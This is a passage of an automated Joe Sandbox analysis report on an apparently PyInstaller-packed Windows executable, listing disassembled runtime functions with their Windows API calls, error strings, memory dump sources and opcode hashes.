                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF6313DE01A,?,?,?,00007FF6313DDD0C,?,?,00000001,00007FF6313DD929), ref: 00007FF6313DDE6B
                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF6313DE01A,?,?,?,00007FF6313DDD0C,?,?,00000001,00007FF6313DD929), ref: 00007FF6313DDE77
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                      • String ID: api-ms-
                                                                                                                                                                      • API String ID: 2559590344-2084034818
                                                                                                                                                                      • Opcode ID: ac8a44a14b46c097b1296329a08db6903c175b988a0b8256de00bf94bd10a686
                                                                                                                                                                      • Instruction ID: 64208e197f72ed23f0b6cd7e5e09e5ecb3b59f980becef6bb6e7615f191efe66
                                                                                                                                                                      • Opcode Fuzzy Hash: ac8a44a14b46c097b1296329a08db6903c175b988a0b8256de00bf94bd10a686
                                                                                                                                                                      • Instruction Fuzzy Hash: 2131A161E1A742D1FF629B02AC006B973D4BF58BA0F5A0535DE2E8B794EF3CE444A300
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313D8A90 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 68COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6313D2A5B), ref: 00007FF6313D8ACA
                                                                                                                                                                        • Part of subcall function 00007FF6313D2980: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6313D87A2,?,?,?,?,?,?,?,?,?,?,?,00007FF6313D101D), ref: 00007FF6313D29B4
                                                                                                                                                                        • Part of subcall function 00007FF6313D2980: MessageBoxW.USER32 ref: 00007FF6313D2A90
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6313D2A5B), ref: 00007FF6313D8B50
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                                                      • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                                                                      • API String ID: 3723044601-876015163
                                                                                                                                                                      • Opcode ID: 944b3e78a2d47948098f3552073c1d159f1f12c7710ab7850aeac045bdb34f75
                                                                                                                                                                      • Instruction ID: e1979b169bec1140b3309e321645fa19b57aebe48e9af7fae6810ffd3a514a89
                                                                                                                                                                      • Opcode Fuzzy Hash: 944b3e78a2d47948098f3552073c1d159f1f12c7710ab7850aeac045bdb34f75
                                                                                                                                                                      • Instruction Fuzzy Hash: AF215E62F08A4281FB50DB2AF804079A3A1FF887C4F584131EB5CC3BA9EE3CE5519704
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313EB5C0 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value$ErrorLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2506987500-0
                                                                                                                                                                      • Opcode ID: fe1e638170c73c8358d48f427b911bbbc02c139701cf0732f1db1911624686f5
                                                                                                                                                                      • Instruction ID: 970cd94f5bdae795aeaec3753c2e220e7f3c3f68ed4cc1925391a9e03ad2c6f7
                                                                                                                                                                      • Opcode Fuzzy Hash: fe1e638170c73c8358d48f427b911bbbc02c139701cf0732f1db1911624686f5
                                                                                                                                                                      • Instruction Fuzzy Hash: F3219F22E0E34682FB6A6732565127961915F447F0F046734E83ECB7DADEBCBE106720
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313F846C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                      • String ID: CONOUT$
                                                                                                                                                                      • API String ID: 3230265001-3130406586
                                                                                                                                                                      • Opcode ID: a1e54ec175de851058e37af8a1d5e0fa141ee03ccab10034a8763fdf20805efa
                                                                                                                                                                      • Instruction ID: 19edd722d673360ad18980d18c12f5246c81eac829e16c7ec1c56d594badd3e4
                                                                                                                                                                      • Opcode Fuzzy Hash: a1e54ec175de851058e37af8a1d5e0fa141ee03ccab10034a8763fdf20805efa
                                                                                                                                                                      • Instruction Fuzzy Hash: BA118B31E18A4286F7509B52E854329A2A4FB98BE4F040234EA2EC77A9CF3CD8649740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313EB738 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF6313E52DD,?,?,?,?,00007FF6313EF06F,?,?,00000000,00007FF6313EB856,?,?,?), ref: 00007FF6313EB747
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF6313E52DD,?,?,?,?,00007FF6313EF06F,?,?,00000000,00007FF6313EB856,?,?,?), ref: 00007FF6313EB77D
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF6313E52DD,?,?,?,?,00007FF6313EF06F,?,?,00000000,00007FF6313EB856,?,?,?), ref: 00007FF6313EB7AA
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF6313E52DD,?,?,?,?,00007FF6313EF06F,?,?,00000000,00007FF6313EB856,?,?,?), ref: 00007FF6313EB7BB
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF6313E52DD,?,?,?,?,00007FF6313EF06F,?,?,00000000,00007FF6313EB856,?,?,?), ref: 00007FF6313EB7CC
                                                                                                                                                                      • SetLastError.KERNEL32(?,?,?,00007FF6313E52DD,?,?,?,?,00007FF6313EF06F,?,?,00000000,00007FF6313EB856,?,?,?), ref: 00007FF6313EB7E7
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value$ErrorLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2506987500-0
                                                                                                                                                                      • Opcode ID: 63a3aeea47663878289526d39a4006a7ce9b45f44c173e715a196441d791a15c
                                                                                                                                                                      • Instruction ID: e517c52fc7540bdc30a53a117d4a91798c80b669c74691be822dc5cb2a6a012b
                                                                                                                                                                      • Opcode Fuzzy Hash: 63a3aeea47663878289526d39a4006a7ce9b45f44c173e715a196441d791a15c
                                                                                                                                                                      • Instruction Fuzzy Hash: 24119026E4E34282FB559331965117961966F447F0F186734D83EC6BCADE7CAE11A320
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313DD728 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                      • String ID: csm$f
                                                                                                                                                                      • API String ID: 2395640692-629598281
                                                                                                                                                                      • Opcode ID: fd8339915c2382beb504f92f2371690f4226147291c5d2cc73aac64d73f8b296
                                                                                                                                                                      • Instruction ID: 1be04cb081fe2011e029a508317954f8ef33847185a13e892b8646606eeaec4f
                                                                                                                                                                      • Opcode Fuzzy Hash: fd8339915c2382beb504f92f2371690f4226147291c5d2cc73aac64d73f8b296
                                                                                                                                                                      • Instruction Fuzzy Hash: 46518C32F19642CAFB15CF25E844A397BA5FF44B88F518134EA5E87788DF78E941A700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313D25A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                      • String ID: Unhandled exception in script
                                                                                                                                                                      • API String ID: 3081866767-2699770090
                                                                                                                                                                      • Opcode ID: 51414fb672fe40a92ea9c14e6c83c1e355ce73d43b77f4f87378d7d39517d9a9
                                                                                                                                                                      • Instruction ID: 105537f59b74df368f818ff51abb4590a06f8f5b129ee9ab8ada94133d5cad97
                                                                                                                                                                      • Opcode Fuzzy Hash: 51414fb672fe40a92ea9c14e6c83c1e355ce73d43b77f4f87378d7d39517d9a9
                                                                                                                                                                      • Instruction Fuzzy Hash: C1313972E09A8289FB20DB61E8552F973A0FF88784F445135EA4E8BB5ADF3CD645D700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313D2980 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6313D87A2,?,?,?,?,?,?,?,?,?,?,?,00007FF6313D101D), ref: 00007FF6313D29B4
                                                                                                                                                                        • Part of subcall function 00007FF6313D8510: GetLastError.KERNEL32(00000000,00007FF6313D29FE,?,?,?,?,?,?,?,?,?,?,?,00007FF6313D101D), ref: 00007FF6313D8537
                                                                                                                                                                        • Part of subcall function 00007FF6313D8510: FormatMessageW.KERNEL32 ref: 00007FF6313D8566
                                                                                                                                                                        • Part of subcall function 00007FF6313D8A90: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6313D2A5B), ref: 00007FF6313D8ACA
                                                                                                                                                                      • MessageBoxW.USER32 ref: 00007FF6313D2A90
                                                                                                                                                                      • MessageBoxA.USER32 ref: 00007FF6313D2AAC
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message$ErrorLast$ByteCharFormatMultiWide
                                                                                                                                                                      • String ID: %s%s: %s$Fatal error detected
                                                                                                                                                                      • API String ID: 2806210788-2410924014
                                                                                                                                                                      • Opcode ID: 99117b17f4c39fadc0b19c6ef7758edd010b836457af41afdf5b4f661e116906
                                                                                                                                                                      • Instruction ID: b1032efbcce201318b932b37f81dfb7bc71144b3f33cf26170d88869b1e528b4
                                                                                                                                                                      • Opcode Fuzzy Hash: 99117b17f4c39fadc0b19c6ef7758edd010b836457af41afdf5b4f661e116906
                                                                                                                                                                      • Instruction Fuzzy Hash: 373125B2A2868291F730DB11E4516EA63A4FF847C4F805136E68D87B59DF3CD745DB40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313E9EC8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                      • Opcode ID: a7e00c60131c6f6b1755f0d1ae2fc89d44cde4883235dc6928da60d710fc640c
                                                                                                                                                                      • Instruction ID: cfeb61998b328b7878e43ff9b3597fdfd81287f496c6e1f787e582604d1bbb59
                                                                                                                                                                      • Opcode Fuzzy Hash: a7e00c60131c6f6b1755f0d1ae2fc89d44cde4883235dc6928da60d710fc640c
                                                                                                                                                                      • Instruction Fuzzy Hash: 3EF062B6F1970281FB108B24E844779A3A0EF48761F541235D9AE863E8CF3CD549E310
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313F9AF0 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _set_statfp
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1156100317-0
                                                                                                                                                                      • Opcode ID: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                                                                                                                                      • Instruction ID: 3d49aaac1500e06b64d9aa56fc90c78b13a0e67a9a21d1e0fb4b12096ee53752
                                                                                                                                                                      • Opcode Fuzzy Hash: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                                                                                                                                      • Instruction Fuzzy Hash: 2D11A026E1CA1B51FB681168E94237921D0AF58370FD81734FA7EC63D6CE7CAC806301
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313EB800 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • FlsGetValue.KERNEL32(?,?,?,00007FF6313EAA17,?,?,00000000,00007FF6313EACB2,?,?,?,?,?,00007FF6313E307C), ref: 00007FF6313EB81F
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF6313EAA17,?,?,00000000,00007FF6313EACB2,?,?,?,?,?,00007FF6313E307C), ref: 00007FF6313EB83E
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF6313EAA17,?,?,00000000,00007FF6313EACB2,?,?,?,?,?,00007FF6313E307C), ref: 00007FF6313EB866
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF6313EAA17,?,?,00000000,00007FF6313EACB2,?,?,?,?,?,00007FF6313E307C), ref: 00007FF6313EB877
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF6313EAA17,?,?,00000000,00007FF6313EACB2,?,?,?,?,?,00007FF6313E307C), ref: 00007FF6313EB888
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                      • Opcode ID: 3b1417492c1664ef56cebc0553d05ba5b8c3d2d36602f5e547c1f8129dc7f272
                                                                                                                                                                      • Instruction ID: b98bd3a74b275a512eb4e29bd4d940ce89a7ca7d820ae59911034008eaa19e9f
                                                                                                                                                                      • Opcode Fuzzy Hash: 3b1417492c1664ef56cebc0553d05ba5b8c3d2d36602f5e547c1f8129dc7f272
                                                                                                                                                                      • Instruction Fuzzy Hash: E9117F22E0A38286FB599322555117A65956F447E0F086334E83DD67DADE7CFE11A320
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313EB694 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                      • Opcode ID: 39ca93b15b7086f2063f4337c840f0784d3557f633beefc8c86d4c1bd21ffce6
                                                                                                                                                                      • Instruction ID: 0288b5dac3babd7e20d55525a256908ad917de8a090253344e999a272471739d
                                                                                                                                                                      • Opcode Fuzzy Hash: 39ca93b15b7086f2063f4337c840f0784d3557f633beefc8c86d4c1bd21ffce6
                                                                                                                                                                      • Instruction Fuzzy Hash: 21112A22E0A30786FB5AA63244512BA21865F453B0F183734D83ECA7DADDBDBE116631
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313E6364 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID: verbose
                                                                                                                                                                      • API String ID: 3215553584-579935070
                                                                                                                                                                      • Opcode ID: 949f789820f60b9edc3b3d9021f3b8c6b6af15b8acf6f547bb3703cfae1424d0
                                                                                                                                                                      • Instruction ID: 5162d3b8aee7e9aa96907d02664f025987fc568753532585db8aa611f7777277
                                                                                                                                                                      • Opcode Fuzzy Hash: 949f789820f60b9edc3b3d9021f3b8c6b6af15b8acf6f547bb3703cfae1424d0
